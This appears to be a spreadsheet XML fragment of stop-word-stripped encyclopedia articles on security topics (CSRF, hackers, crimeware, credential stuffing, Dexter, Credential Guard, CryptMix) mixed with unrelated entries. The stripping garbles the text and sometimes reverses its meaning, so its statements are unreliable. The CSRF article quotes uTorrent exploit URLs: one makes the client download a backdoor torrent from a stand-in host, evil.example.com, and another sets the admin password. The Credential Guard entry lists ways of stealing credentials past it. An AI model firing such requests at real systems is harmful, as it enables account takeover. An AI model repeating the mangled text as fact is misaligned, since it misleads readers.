    <t>cross-site request forgery, also known one-click attack session riding abbreviated csrf (sometimes pronounced sea-surf) xsrf, type malicious exploit website unauthorized commands submitted user application trusts. there many ways malicious website transmit commands; specially-crafted image tags, hidden forms, javascript xmlhttprequests, example, work without user's interaction even knowledge. unlike cross-site scripting (xss), exploits trust user particular site, csrf exploits trust site user's browser. csrf attack, innocent user tricked attacker submitting request intend. this cause actions performed website include inadvertent client server data leakage, change session state, manipulation user's account. term "csrf" also used abbreviation defences csrf attacks, techniques header data, form data, cookies, test prevent attacks. characteristics csrf attack, attacker's goal cause innocent victim unknowingly submit maliciously crafted request website victim privileged access this request crafted include parameters, cookies data appear normal server processing request. risk applications perform actions based input trusted authenticated users without requiring user authorize specific action. user authenticated cookie saved user's browser could unknowingly send http request site trusts user thereby cause unwanted action. general property browsers automatically invisibly include cookies (including session cookies others) used given domain request sent domain. this property exploited csrf attacks. event user tricked inadvertently submitting request browser automatically included cookies cause forged request appear real server perform appropriately requested actions including returning data, manipulating session state, making changes victim's account. order csrf attack work, attacker must identify reproducible request executes specific action changing account password target page. once request identified, link created generates malicious request link embedded page within attacker's control. this link placed even necessary victim click link. example, embedded within html image email sent victim automatically loaded victim opens email. once victim clicked link, browser automatically include cookies used website submit request server. server able identify forgery request made user logged submitted requisite cookies. cross-site request forgery example confused deputy attack browser browser tricked submitting forged request less privileged attacker. csrf commonly following characteristics: involves sites rely user's identity. exploits site's trust identity. tricks user's browser sending http requests target site user already authenticated. involves http requests side effects. history csrf token vulnerabilities known cases exploited since 2001. because carried user's address, website logs might evidence csrf. exploits under-reported, least publicly, 2007 well-documented examples: netflix website 2006 numerous vulnerabilities csrf, could allowed attacker perform actions adding victim's rental queue, changing shipping address account, altering victim's login credentials fully compromise account. online banking application direct vulnerable csrf attack allowed illicit money transfers. popular video website youtube also vulnerable csrf 2008 allowed attacker perform nearly actions user. mcafee secure also vulnerable csrf allowed attackers change company system. this fixed newer versions.new attacks web-enabled devices carried 2018, including attempts change settings routers. some router manufacturers hurriedly released firmware updates improve protection, advised users change router settings reduce risk. details released, citing "obvious security reasons". example attackers find reproducible link executes specific action target page victim logged embed link page control trick victim opening attack carrier link placed location victim likely visit logged target site (for example, discussion forum), sent html email body attachment. real csrf vulnerability utorrent (cve-2008-6586) exploited fact console accessible localhost:8080 allowed critical actions executed using simple request: force .torrent file download http://localhost:8080/gui/?action=add-url&amp;s=http://evil.example.com/backdoor.torrent change utorrent administrator password http://localhost:8080/gui/?action=setsetting&amp;s=webui.password&amp;v=eviladminattacks launched placing malicious, automatic-action html image elements forums email spam, browsers visiting pages would open automatically, without much user action. people running vulnerable utorrent version time opening pages susceptible attack. csrf attacks using image tags often made internet forums, users allowed post images javascript, example using bbcode: when accessing attack link local utorrent application localhost:8080, browser would also always automatically send existing cookies domain. this general property browsers enables csrf attacks exploit targeted vulnerabilities execute hostile actions long user logged target website example, local utorrent interface) time attack. utorrent example described above, attack facilitated fact utorrent's interface used request critical state-changing operations (change credentials, download file etc.), 2616 explicitly discourages: particular, convention established head methods should significance taking action retrieval. these methods ought considered "safe". this allows user agents represent methods, post, delete, special way, user made aware fact possibly unsafe action requested. because assumption, many existing csrf prevention mechanisms frameworks cover requests, rather apply protection http methods intended state-changing. forging login requests attacker forge request victim target website using attacker's credentials; known login csrf. login csrf makes various novel attacks possible; instance, attacker later site legitimate credentials view private information like activity history saved account. this attack demonstrated google yahoo. http verbs csrf depending type, http request methods vary susceptibility csrf attacks (due differences handling browsers). therefore, protective measures attack depend method http request. http csrf exploitation trivial, using methods described above, simple hyperlink containing manipulated parameters automatically loaded tag. http specification however, used safe method, significantly changing user's state application. applications using operations switch http post anti-csrf protection. http post vulnerability csrf depends usage scenario: simplest form post data encoded query string (field1=value1&amp;field2=value2) csrf attack easily implemented using simple html form anti-csrf measures must applied. data sent format (json, xml) standard method issue post request using xmlhttprequest csrf attacks prevented same-origin policy (sop) cross-origin resource sharing (cors); technique send arbitrary content simple html form using enctype attribute; fake request distinguished legitimate ones text/plain content type, enforced server, csrf executed http methods (put, delete etc.) issued using xmlhttprequest same-origin policy (sop) cross-origin resource sharing (cors) preventing csrf; measures however active websites explicitly disable using access-control-allow-origin: header other approaches csrf additionally, typically described static type attack, csrf also dynamically constructed part payload cross-site scripting attack, demonstrated samy worm, constructed session information leaked offsite content sent target malicious url. csrf tokens could also sent client attacker session fixation vulnerabilities, guessed brute-force attack, rendered malicious page generates thousands failed requests. attack class "dynamic csrf", using per-client payload session-specific forgery, described 2009 nathan hamiel shawn moyer blackhat briefings, though taxonomy gain wider adoption. vector composing dynamic csrf attacks presented oren ofer local owasp chapter meeting january 2012 "ajax hammer dynamic csrf". effects severity metrics issued csrf token vulnerabilities result remote code execution root privileges well vulnerability compromise root certificate, completely undermine public infrastructure. limitations several things happen cross-site request forgery succeed: attacker must target either site check referrer header victim browser plugin allows referer spoofing. attacker must find form submission target site, side effects, something (e.g., transfers money, changes victim's e-mail address password). attacker must determine right values forms inputs; required secret authentication values attacker can't guess, attack likely fail (unless attacker extremely lucky guess). attacker must lure victim page malicious code victim logged target site.the attack blind: attacker cannot target website sends back victim response forged requests, unless exploit cross-site scripting target website. similarly, attacker target links submit forms come initial forged request subsequent links forms similarly predictable. (multiple targets simulated including multiple images page, using javascript introduce delay clicks.) prevention most csrf prevention techniques work embedding additional authentication data requests allows application detect requests unauthorized locations. synchronizer token pattern synchronizer token pattern (stp) technique token, secret unique value request, embedded application html forms verified server side. token generated method ensures unpredictability uniqueness (e.g. using hash chain random seed). attacker thus unable place correct token requests authenticate them.example django html form: compatible relies html, introduces complexity server side, burden associated checking validity token request. token unique unpredictable, also enforces proper sequence events (e.g. screen raises usability problem (e.g. user opens multiple tabs). relaxed using session csrf token instead request csrf token. cookie-to-header token applications javascript majority operations following anti-csrf technique: initial visit without associated server session, application sets cookie scoped appropriately provided cross-origin requests. cookie typically contains random token remain life sessionset-cookie: __host-csrf_token=i8xnjc4b8kvok4uw5rftr38wgp2bfwql; expires=thu, 23-jul-2015 10:25:33 gmt; max-age=31449600; path=/; samesite=lax; secure javascript operating client side reads value copies custom http header sent transactional requestx-csrf-token: i8xnjc4b8kvok4uw5rftr38wgp2bfwql server validates presence integrity tokensecurity technique based assumption javascript running client side https connection server initially cookie able read cookie's value. javascript running rogue file email able successfully read cookie value copy custom header. even though csrf-token cookie automatically sent rogue request, server still expect valid x-csrf-token header. csrf token unique unpredictable. generated randomly, derived session token using hmac: csrf_token hmac(session_token, application_secret) csrf token cookie must httponly flag, intended read javascript design. this technique implemented many modern frameworks, django angularjs. because token remains constant whole user session, works well ajax applications, enforce sequence events application. protection provided technique thwarted target website disables same-origin policy using following techniques: clientaccesspolicy.xml file granting unintended access silverlight controls crossdomain.xml file granting unintended access flash movies double submit cookie similarly cookie-to-header approach, without involving javascript, site csrf token cookie, also insert hidden field html form. when form submitted, site check cookie token matches form token. same-origin policy prevents attacker reading setting cookies target domain, cannot valid token crafted form.the advantage technique synchronizer pattern token need stored server. samesite cookie attribute additional "samesite" attribute included server sets cookie, instructing browser whether attach cookie cross-site requests. attribute "strict", cookie sent same-site requests, making csrf ineffective. however, requires browser recognise correctly implement attribute. client-side safeguards browser extensions requestpolicy (for mozilla firefox) umatrix (for firefox google chrome/chromium) prevent csrf providing default-deny policy cross-site requests. however, significantly interfere normal operation many websites. csfire extension (also firefox) mitigate impact csrf less impact normal browsing, removing authentication information cross-site requests. noscript extension firefox mitigates csrf threats distinguishing trusted untrusted sites, removing authentication payloads post requests sent untrusted sites trusted ones. application boundary enforcer module noscript also blocks requests sent internet pages local sites (e.g. localhost), preventing csrf attacks local services (such utorrent) routers. self destructing cookies extension firefox directly protect csrf, reduce attack window, deleting cookies soon longer associated open tab. other techniques various techniques used proposed csrf prevention historically: verifying request's headers contain x-requested-with (used ruby rails v2.0 django v1.2.5), checking http referer header and/or http origin header. however, insecure combination browser plugins redirects allow attacker provide custom http headers request website, hence allowing forged request. checking http referer header request coming authorized page commonly used embedded network devices increase memory requirements. however, request omits referer header must treated unauthorized attacker suppress referer header issuing requests https urls. this strict referer validation cause issues browsers proxies omit referer header privacy reasons. also, versions flash (before 9.0.18) allow malicious flash generate post requests arbitrary http request headers using crlf injection. similar crlf injection vulnerabilities client used spoof referrer http request. post request method perceived immune trivial csrf attacks using parameters (using method). however, post http method easily executed using xmlhttprequest. filtering unexpected requests still prevents particular attacks, cross-site attacks using malicious image urls link addresses cross-site information leakage &lt;script&gt; elements (javascript hijacking); also prevents (non-security-related) problems aggressive crawlers link prefetching.cross-site scripting (xss) vulnerabilities (even applications running domain) allow attackers bypass essentially csrf preventions. also breach (security exploit) confused deputy problem crime (security exploit) cross-document messaging heap spraying replay attack session fixation application security references external links most-neglected fact about cross site request forgery cross-site request forgery cross-site request forgery application security consortium threat classification project</t>
  </si>
  <si>
    <t>Deniss Čalovskis</t>
  </si>
  <si>
    <t>deniss čalovskis (born 1985 riga, latvia) latvian computer hacker. creator gozi virus. calovskis certified data protection officer (dpo). hacker february 2015, deniss čalovskis extradited u.s. latvia face years prison.in september 2015, čalovskis pleaded guilty conspiring commit computer intrusions. january 2016, sentenced time served spending months latvian american jails.the gozi virus prevalent 2005 2012, infecting 17,000 40,000 computers including nasa. financial losses virus stand minimum, millions dollars", according indictment.in august 2014, čalovskis began working latvian medical association. čalovskis started several social nonprofit projects local community latvia. references</t>
  </si>
  <si>
    <t>Dennis L. Montgomery</t>
  </si>
  <si>
    <t>dennis montgomery (born 1953) american software designer former medical technician sold computer programs federal officials claimed would decode secret al-qaeda messages hidden jazeera broadcasts identify terrorists based predator drone videos. 2010 playboy investigation called montgomery "the conned pentagon", saying millions federal contracts supposed terrorist-exposing intelligence software. software later reported elaborate hoax montgomery's former lawyer called "con artist" "habitual liar engaged fraud". career 1998, montgomery co-founded etreppid technologies partner warren trepp develop video compression noise filtering software gaming casino industries. montgomery trepp evolved offerings military applications 2004 no-bid contract united states department defense. following dispute software ownership, montgomery separated etreppid 2006 formed venture billionaire backers edra blixseth. originally called opspring, venture later renamed blxware, montgomery title chief scientist. blxware dissolved 2009 part blixseths' divorce edra blixseth's bankruptcy. etreppid technologies, montgomery became partner 1998 warren trepp, former chief junk bond trader michael milken drexel burnham lambert, another investor, wayne prim, develop sell audio, video, data compression software banner etreppid technologies. executive vice president chief technology officer etreppid, montgomery company's efforts develop company's software promote government agencies associated tracking terrorist activities. 2004, etreppid awarded million no-bid contract united states special operations command ranked 16th-largest defense contractor year, according aerospace daily. blxware partnership after separation etreppid, montgomery joined edra blixseth bring alleged terrorist tracking software u.s. foreign government clients. with blixseths former presidential candidate jack kemp helped form opspring llc, later renamed blxware. blxware, montgomery pursued selling terror tracking software u.s. israel governments, leveraging political connections blixseth partnership. blxware's owners edra blixseth divorced 2008 blxware became part edra blixseth's sole property. filed personal bankruptcy 2009, resulted chapter liquidation assets, including blxware associated software intellectual property. terrorist software hoax national public radio reported, "for several months starting fall 2003, montgomery's analysis directly national code orange security alerts cancelled flights. problem: making up."montgomery's software claims reportedly responsible false terror alert grounded international flights caused department homeland security secretary ridge raise government's security level. february 2006, federal bureau investigation (fbi) u.s. force office special investigations opened economic espionage theft intellectual property investigation montgomery blxware.in 2015, montgomery, counsel larry klayman, sued james risen, author price: greed, power, endless war, defamation, alleging book falsely described montgomery "the maestro behind many current former u.s. officials others familiar case believe elaborate dangerous hoaxes american history." 2016, federal court dismissed montgomery's lawsuit. november 2017, united states court appeals district columbia circuit affirmed dismissal. nevada governor bribery scandal during run-up 2006 gubernatorial election, dennis montgomery accused gubernatorial candidate gibbons accepting bribes serving member congress help montgomery's company etreppid technologies secure military contracts terrorist software. court papers associated lawsuit montgomery former business partner warren trepp, montgomery accused gibbons accepting casino chips $100,000 cash trepp caribbean cruise. montgomery provided copies said trepp's personal e-mails accessed working etreppid technologies. gibbons' lawyers claimed evidence montgomery fabricated emails presented computer expert evidence trial challenged authenticity montgomery's alleged evidence. november 2008, gibbons' defense attorney said 18-month investigation resulted charges cleared gibbons wrongdoing. confidential informant sheriff arpaio june 2014, reporter stephen lemons phoenix times wrote montgomery hired sheriff arpaio maricopa county sheriff's office (mcso) confidential informant. lemons, citing anonymous source mcso, said montgomery claimed that, using data obtained working central intelligence agency (cia), could prove conspiracy arpaio u.s. department justice murray snow, federal judge presiding racial-profiling lawsuit filed maricopa county. april 2015, arpaio confirmed confidential informant relationship testimony judge snow. arpaio's request, national security agency computer specialists examined montgomery's material concluded, contrary montgomery's representations, contain data cia. arpaio later characterized result montgomery's investigation "junk".in 2015, montgomery attempted intervene contempt proceedings arpaio stemmed racial-profiling lawsuit. montgomery, counsel larry klayman, asked judge snow recuse himself; montgomery also asked united states court appeals ninth circuit replace judge, court declined wiretapping allegations wake trump tower wiretapping allegations, klayman montgomery's behalf claimed montgomery evidence security agencies involved "systematic illegal surveillance prominent americans", including donald trump jerome corsi. mike zullo, former member msco's cold-case posse, similarly echoed claims montgomery's data; zullo, however, previously doubted authenticity data.in june 2017, montgomery klayman jointly sued james comey federal government officials, alleging coverup evidence that, according montgomery, shows existence widespread illegal surveillance federal government. march 2018, federal district court dismissed lawsuit. according klayman, montgomery also claimed security agencies manipulated voting florida 2008 united states presidential election. 2020 united states presidential election part attempt overturn 2020 united states presidential election, american report published stories montgomery claimed supercomputer called hammer, running software called scorecard, used steal votes trump. montgomery's claims repeated mike lindell sidney powell. chris krebs, director cybersecurity infrastructure security agency, characterized claims "nonsense" "hoax".at lindell's august 2021 cyber symposium 2020 election, staff confirmed montgomery lindell's source data election. references external links agency france press: swindler duped al-qaeda decoding scam guardian: nevada gambler, al-qaida, mother cons harpers magazine: state stupidities; state secrets</t>
  </si>
  <si>
    <t>Dennis Moran (computer criminal)</t>
  </si>
  <si>
    <t>dennis michael moran (october 1982 april 2013), also known alias coolio, american computer hacker wolfeboro, hampshire, accused february 2000 series denial-of-service attacks shut popular websites internet. years committed attacks. later arrested pleaded guilty defacing websites drug abuse resistance education security, well unauthorized access u.s. army force computer systems four military bases. moran died drug overdose 2013. attacks february 2000, smurf attack generating gigabit second internet control message protocol traffic launched yahoo!'s routers, causing websites inaccessible world hours. message sent cert coordination center, yahoo! network engineer koum stated attackers "above average script kiddie" "knew topology planned large scale attack advance."shortly thereafter, stanford university's computer security administrator david brumley began monitoring internet relay chat (irc) traffic irc.stanford.edu, public server efnet network. discovered discussions attack yahoo! taking place believe members channel information source attacks, contacted give transcripts chat.over following week series equally crippling denial-of-service attacks affected many major internet sites including ebay, amazon.com, e*trade, buy.com. security consultant named joel garza also began investigating channel channel, security's website redirected hacked server colombia defaced copy home page. defacement included reference david brumley's nickname irc, joined channel attempt gather information moran. garza witnessed live show criminal activity later reported media. march 2000, raided moran's house seized computers. after much attention drawn him, garza's account moran responsible defacing rsa's website, investigated moran's connections website defacements. eventually passed evidence hampshire attorney general's office moran charged adult counts class felony unauthorized access computer. year later, march 2001, pleaded guilty counts misdemeanor unauthorized access computer sentenced months jail months suspended well ordered $15,000 restitution. arrest took place wolfeboro, hampshire. professional career during time jail, moran mentored paul zimmerman helped start computer consulting company, computer services. work focused troubleshooting home business computers around wolfeboro, also list convicted computer criminals references external links mirror defaced d.a.r.e. website taken november 1999 mirrors four defacements</t>
  </si>
  <si>
    <t>Croatian Revolution Hackers</t>
  </si>
  <si>
    <t>croatian revolution hackers (crh) black hacking group originating croatia, known using ddos, defacement, methods targeted websites croatia neighboring countries (serbia, bosnia herzegovina, montenegro, etc.) group disbanded 2014 (exact date unknown). believed biggest croatian hacking group ever. members group consisted four core members: dizi, hunt3r (a.k.a. josip mamic) meho1337 (facebook-meho croatianhackers) inco1337 (facebook-inco fiju ranger). targets group attacked websites using mainly ddos choice weaponry. their targets mostly croatia, including government croatia (ex. vlada.hr), croatian police (policija.hr mup.hr), websites banks (hypo, raiffeisen, etc.) many ministry important websites. #opcroblackout operation croatian blackout (#opcrobo) notable series attack perpetrated crh. lasted july july 2013. group claimed shut 1000 websites originating croatia, including biggest media ones (dnevnik.hr, 24sata.hr, such), defaced stolen data croatian radiotelevision (hrt.hr). attack made headlines across balkans, rumors said biggest ddos attack ever carried region. external links dalje.com novilist.hr occupy.com seebiz.eu republikainfo.com</t>
  </si>
  <si>
    <t>Crimeware</t>
  </si>
  <si>
    <t>crimeware class malware designed specifically automate cybercrime.crimeware distinct spyware adware) designed perpetrate identity theft social engineering technical stealth order access computer user's financial retail accounts purpose taking funds accounts completing unauthorized transactions behalf cyberthief. alternatively, crimeware steal confidential sensitive corporate information. crimeware represents growing problem network security many malicious code threats seek pilfer valuable, confidential information. term crimeware coined david jevans february 2005 anti-phishing working group response fdic article "putting account-hijacking identity theft," published december 2004. examples criminals variety techniques steal confidential data crimeware, including following methods: surreptitiously install keystroke loggers collect sensitive data—login password information online bank accounts, example—and report back thief. redirect user's browser counterfeit website controlled thief even user types website's proper domain name address bar, also known pharming. steal passwords cached user's system. hijack user session financial institution drain account without user's knowledge. enable remote access applications, allowing criminals break networks malicious purposes. encrypt data computer require user ransom decrypt (ransomware). delivery vectors crimeware threats installed victims' computers multiple delivery vectors, including: vulnerabilities applications. bankash.g trojan, example, exploited internet explorer vulnerability steal passwords monitor user input webmail online commerce sites. targeted attacks sent smtp. these social-engineered threats often arrive disguised valid e-mail message include specific company information sender addresses. malicious e-mails social engineering manipulate users open attachment execute payload. remote exploits exploit vulnerabilities servers clients concerns crimeware significant economic impact loss sensitive proprietary information associated financial losses. survey estimates 2005 organizations lost excess million theft proprietary information. theft financial confidential information corporate networks often places organizations violation government industry-imposed regulatory requirements attempt ensure financial, personal confidential. united states laws regulations include: sarbanes-oxley health insurance portability accountability (hipaa) gramm-leach-bliley family educational rights privacy california senate bill 1386 (2002) payment card industry data security standard also malware metasploit project mpack (software), php-based crimeware targeted attacks tiny banker trojan, small banking trojan phishing spyware zeus (malware), perhaps best known banking trojan references external links symantec internet security threat report archived 2006-11-15 wayback machine computer security institute (archived: august 2002, 22:18:34) "real-time hackers foil two-factor security" (technology review, september 2009) "cyber crooks target public private schools", (washington post, september 2009) "crimeware gets worse avoid robbed pc", (computerworld, september 2009)</t>
  </si>
  <si>
    <t>Derp (hacker group)</t>
  </si>
  <si>
    <t>derptrolling (austin thompson) name hacker active 2011 2014. largely used twitter coordinate distributed denial service attacks various high traffic websites. december 2013 managed bring large gaming sites league legends attempt troll popular livestreamer phantoml0rd. public reaction presence generally negative, largely owing unclear nature motives. attacks initially, derp sent tweets using twitter account “derptrolling” indicate going bring popular gaming website league legends. first attack however, game called quake live. hours afterwards, many league legends game server regions north america, europe, oceania, well website internet forums taken down. bring game servers, used indirect attack riot games' internet service provider internap. revealed targeting popular livestreamer goes name phantoml0rd streaming website twitch. reddit summarized report saying planned distributed denial service attacks flood traffic various high-profile gaming websites associated phantoml0rd, including league legends blizzard entertainment's battle.net. according escapist, hacker also issued threat take dota phantoml0rd lose game, hacker carried out. however, crashed phantoml0rd's game, games dota running normally. when phantoml0rd asked hacker attacking sites, responded saying "for lulz" also partially dislike "money-hungry companies." also persuaded phantoml0rd playing club penguin simultaneously managing take electronic arts website ea.com. phantoml0rd's personal information leaked attack released onto multiple gaming websites, process often referred doxing. this many fake orders pizza arriving house, well police raid house received reports hostage situation. according phantoml0rd, least policemen searched house, realized later call fake. hacker group claimed additionally attacked several internet games websites including world tanks, north korean news network kcna, runescape, online, westboro baptist church website, website online servers minecraft, many others. attacks, riot games issued statement confirming league legends services indeed attacked hacker, though hacker brought services back online. aftermath reaction news website latinopost criticized attack "frivolous" merely "just attention," unlike so-called hacktivist groups. venturebeat noted phantoml0rd's stream still drawing hundred thousand viewers "still good traffic." playstation lifestyle stated believe current problems playstation network "influx owners increased holiday online activity" effect damage hacker attempted network. editor popular gaming news website game informer's mike futter also blamed twitch streaming service phantoml0rd shutting stream immediately despite received several warnings throughout, tantamount playing accomplices crime. varga defended saying merely trying maintain business, comply, derptrolling would targeted another streamer. also lizard squad anonymous (group) references</t>
  </si>
  <si>
    <t>Creeper and Reaper</t>
  </si>
  <si>
    <t>creeper first computer worm, reaper first antivirus software, designed eliminate creeper. creeper creeper experimental computer program written thomas 1971. original iteration designed move pdp-10 mainframe computers running tenex operating system using arpanet, later version tomlinson designed copy computers rather simply move. this self-replicating version creeper generally accepted first computer worm. creeper test created demonstrate possibility self-replicating computer program could spread computers. program actively malicious software caused damage data, effect message output teletype reading "i'm creeper. catch can!" reaper reaper first anti-virus software, designed delete creeper moving across arpanet. created tomlinson 1972. cultural impact conflict creeper reaper served inspiration programming game core war, fictionalized versions reaper used antagonists anime digimon tamers visual novel digital: love story. humanized creeper also appeared webcomic internet explorer, alongside likewise personified morris worm. references</t>
  </si>
  <si>
    <t>Detroit Community Scrip</t>
  </si>
  <si>
    <t>detroit community scrip, also called detroit cheers, local currency used detroit, michigan, first issued april 2009. modeled upon local scrip used great depression, used restore local financial confidence following decades economic decline. cheers backed u.s. currency fully exchangeable equal amount u.s. dollars, backed several detroit-based businesses. april 2009, $4,500 worth cheers circulation. businesses could sign issuers print scrip depositing matching amount u.s. dollars entitled print cheers. history detroit scrip first issued april 2009, foran's grand trunk park motor city brewing works. including issuers, initial businesses accepting cheer.by november 2009, official website detroit community scrip longer live. design detroit cheers available denomination; standardized face cheer features spirit detroit detroit skyline. back bill designed issuing business could vary. references external links official website</t>
  </si>
  <si>
    <t>Credential stuffing</t>
  </si>
  <si>
    <t>credential stuffing type cyberattack attacker collects stolen account credentials, typically consisting lists usernames and/or email addresses corresponding passwords (often data breach), uses credentials gain unauthorized access user accounts large-scale automated login requests directed application. unlike credential cracking, credential stuffing attacks attempt brute force guess passwords attacker simply automates logins large number (thousands millions) previously discovered credential pairs using standard automation tools selenium, curl, phantomjs tools designed specifically types attacks, sentry mba, snipr, storm, blackbullet openbullet.credential stuffing attacks possible many users reuse username/password combination across multiple sites, survey reporting users reused password across sites users passwords across majority accounts. 2017, issued advisory suggesting specific actions companies needed take credential stuffing, insisting secure passwords guarding attacks. according former google click fraud czar shuman ghosemajumder, credential stuffing attacks login success rate, meaning million stolen credentials take 20,000 accounts. wired magazine described best protect credential stuffing unique passwords accounts, generated automatically password manager, enable two-factor authentication, companies detect stop credential stuffing attacks. credential spills credential stuffing attacks considered among threats mobile applications result volume credential spills. more three billion credentials spilled online data breaches 2016 alone. origin term coined sumit agarwal, co-founder shape security, serving deputy assistant secretary defense pentagon time. incidents august 2018, u.k. health beauty retailer superdrug targeted attempted blackmail, hackers showing purported evidence penetrated company's site downloaded 20,000 users' records. evidence likely obtained hacks spillages used source credential stuffing attacks glean information create bogus evidence.in october november 2016, attackers gained access private github repository used uber (uber uber developers, using employees' usernames passwords compromised previous breaches. hackers claimed hijacked employees' user accounts using credential-stuffing method, email addresses passwords reused platforms. multi-factor authentication, though available, activated affected accounts. hackers located credentials company's datastore repository files, used obtain access records million non-us users million non-us drivers, well data contained buckets. attackers alerted uber, demanding payment $100,000 agree delete data. company paid bounty program disclose incident affected parties year. after breach came light, company fined £385,000 (reduced £308,000) u.k. information commissioner's office.in 2019 cybersecurity research firm knight lion security claimed report credential stuffing favored attack method gnosticplayers. compromised credential checking compromised credential checking technique enabling users notified passwords breached websites, browsers password extensions. february 2018, british computer scientist junade created communication protocol (using k-anonymity cryptographic hashing) anonymously verify whether password leaked without fully disclosing searched password. this protocol implemented public consumed multiple websites services, including password managers browser extensions. this approach later replicated google's password checkup feature. worked academics cornell university develop versions protocol known frequency smoothing bucketization (fsb) identifier-based bucketization (idb). march 2020, cryptographic padding added protocol. compromised credential checking implementations also data breach references external links "owasp entry credential stuffing"</t>
  </si>
  <si>
    <t>Devin Finzer</t>
  </si>
  <si>
    <t>devin finzer (born 1990) american entrepreneur technology executive. co-founder current chief executive officer opensea, world's largest marketplace non-fungible tokens. january 2022, forbes estimated stakes opensea owned finzer co-founder alex atallah worth approximately $2.2 billion each, making first non-fungible token billionaires. early life education devin finzer born 1990; mother physician father works software engineer. finzer grew francisco area attended miramonte high school orinda, california.finzer matriculated brown university, earned bachelor science computer science mathematics 2013. junior year brown, finzer worked future figma founder dylan field create coursekick, socially-oriented search engine university course registration. just weeks site launched, undergraduate students registered. while brown, finzer interned wikimedia foundation, google cloud platform, flipboard. after graduating, took pinterest francisco software engineer. career finzer co-founded tech startups, including claimdog, personal finance acquired credit karma undisclosed amount. credit karma, finzer became interested blockchain technology. with alex atallah, finzer developed pitched wificoin, would offer tokens exchange sharing access wireless router. pair pitched concept combinator accepted. inspired release cryptokitties, pair pivoted non-fungible token market, founding opensea december 2017.after 2018 pre-seed round combinator, opensea raised $2.1 million venture capital november 2019. march 2021, company raised million venture capital; four months later company announced another investment round $100 million making unicorn. january 2022, opensea raised $300 million series funding, propelling company's valuation $13.3 billion.in july 2021, finzer listed 19th forbes "nfty list influential individuals non-fungible token scene. references</t>
  </si>
  <si>
    <t>Dexter (malware)</t>
  </si>
  <si>
    <t>dexter computer virus point sale malware infects computers running microsoft windows discovered security firm seculert, december 2012. infects systems worldwide steals sensitive information credit card debit card information. function when dexter infects machine injects iexplore.exe, executable file runs internet explorer. also changes windows registry entries allow malware startup machine. malware parses memory dumps using windows function called readprocessmemory. dexter uploads contents memory parses machines server located republic seychelles. information dexter collect includes credit debit card information, user names host names, operating system data, list running processes, encryption keys data collects decrypted. impact businesses infected dexter include retail stores, hotels, restaurants, banks, private parking providers. december 2012, around time first discovered, malware found different countries, compromised machines located united states, united kingdom, canada. variant dexter, thought modified avoid antimalware detection unknown group linked estimated losses tens millions banks south africa. south africa's banks noticed "unusual levels suspected fraud" customers used credit cards various fast-food restaurants. updated antimalware signature provided outlets suspected using infected machines. unknown many credit cards compromised attacks, many monitored fraud incident. variants stardust december 2013, researchers discovered stardust, major revision dexter, compromised 20,000 cards active campaign hitting merchants. first known botnets target point-of-sale (pos) terminals used stores restaurants process customers' credit debit card payments. unlike original version dexter, stardust also extract information internal network traffic instead information contained device. also cyber electronic warfare cyber security standards cyber warfare list cyber attack threat trends proactive cyber defence point-of-sale malware references external links "dexter draining blood point sales". blog.seculert.com. december 2012. archived original december 2012. retrieved december 2012.</t>
  </si>
  <si>
    <t>Credential lag</t>
  </si>
  <si>
    <t>credential usually occurs user attempting system relies updating cached otherwise saved user credentials conferring active directory similar database. when user changes resets password, take time third party software retrieve credentials active directory catalog; instance, intranet service queries permissions. example user "another" prompted change password expired windows domain account. once changed, active directory updated, user proceeds however, case internal intranet site refreshes every minutes, therefore, intranet refreshes credential database, user unable intranet service minutes. references</t>
  </si>
  <si>
    <t>Credential Guard</t>
  </si>
  <si>
    <t>credential guard virtualization-based isolation technology lsass prevents attackers stealing credentials could used pass hash attacks. credential guard introduced microsoft's windows operating system. windows version 20h1, credential guard available enterprise edition operating system. summary after compromising system, attackers often attempt extract stored credentials lateral movement network. prime target lsass process, stores ntlm kerberos credentials. credential guard prevents attackers dumping credentials stored lsass running lsass virtualized container even user system privileges cannot access. system creates proxy process called lsaiso (lsa isolated) communication virtualized lsass process. bypass techniques there several generic techniques stealing credentials systems credential guard: keylogger running system capture typed passwords. user administrator privileges install security support provider (ssp). able access stored password hashes, able capture passwords installed. extract stored credentials another source, performed "internal monologue" attack (which uses sspi retrieve crackable netntlmv1 hashes). references</t>
  </si>
  <si>
    <t>CryptMix</t>
  </si>
  <si>
    <t>cryptmix type ransomware claims ransom fees donated children’s charity. cryptmix threat combines large portions open source ransomware code: cryptowall 3.0, cryptowall cryptxxx. cryptmix created group calling “the charity team.” operation single link sent spam email sends victims malicious websites encrypts files network. message prompted screen explaining files locked rsa-2048 algorithm, urges user email email addresses recover files. cryptmix automatically begins encrypt different file types victim’s device soon gets installed. infected files recognized .code file extension. recovery files victims sent link password secret website told must estimated $35,000) recover lost files. this amount doubles unless paid within hours. ransomware creators tell victims ransom money toward children’s charity. victims also promised three years “free tech support.” decryption tools cannot used regain access encrypted files. time, known method decrypt compromised files. references</t>
  </si>
  <si>
    <t>Defective by Design</t>
  </si>
  <si>
    <t>defective design (dbd) anti-drm initiative free software foundation. digital rights management (drm) technology restricts users' ability freely purchased movies, music, literature, software, hardware ways accustomed ordinary non-restricted media (such books audio compact discs). result, described "digital restrictions management" "digital restrictions mechanisms" opponents.the philosophy initiative designed deliberately defective, restrict product. this, claim, cripples future digital freedom. group aims target "big media, unhelpful manufacturers, distributors" bring public awareness issue increase participation initiative. represents first efforts free software foundation find common cause mainstream social activists, encourage free software advocates become socially involved. late 2006, campaign claiming 12,000 registered members. view impact used encrypt various multimedia products (including audio, video, console games) intended restrict uses product rights holders intend. examples functionality include limiting prohibiting duplication media attempt prevent copyright infringement lawful archiving sharing media, encrypting blocking access system's input output prevent usage non-licensed products, competitor's hardware media, preventing users duplicating dvd, preventing advertisements dvds skipped, preventing interoperability competing products. although tech-savvy users often able find around drm, difficult require analog hole. others, might prevent using media legal ways.in addition restricting copying drm-restricted media, allow computer systematically disobey owner. history defective design joint effort free software foundation civicactions, company develops online advocacy campaigns. chief organizers gregory heller civicactions, peter brown, executive director free software foundation, henry poole, civicactions member also director free software foundation. campaign launched 2006, anti-drm protest winhec. protest featured free software foundation (fsf) members yellow hazmat suits "handing pamphlets explaining microsoft products words slogan campaign 'defective design' technologies included them".since then, campaign launched number actions varying degrees success. campaign claims phone-in campaign recording industry association america related organizations around world resulted thousands calls people questioning industry's position drm. hand, efforts meet bono prominent supporter apple's drm-regulated itunes, success. however, four major record labels dropped pending lawsuits joined apple microsoft eliminate digital rights management music sales. defectivebydesign.org proclaimed october 2006, "day against drm", organized several events outside apple stores hazmat suits worn protesters leaflets handed public explaining apple's itunes music store ipod media players.on january 2007, campaign organized along badvista campaign times square. protesters hazmat suits handed literature attendants dangers windows vista's digital rights management trusted computing features, well handing containing free software 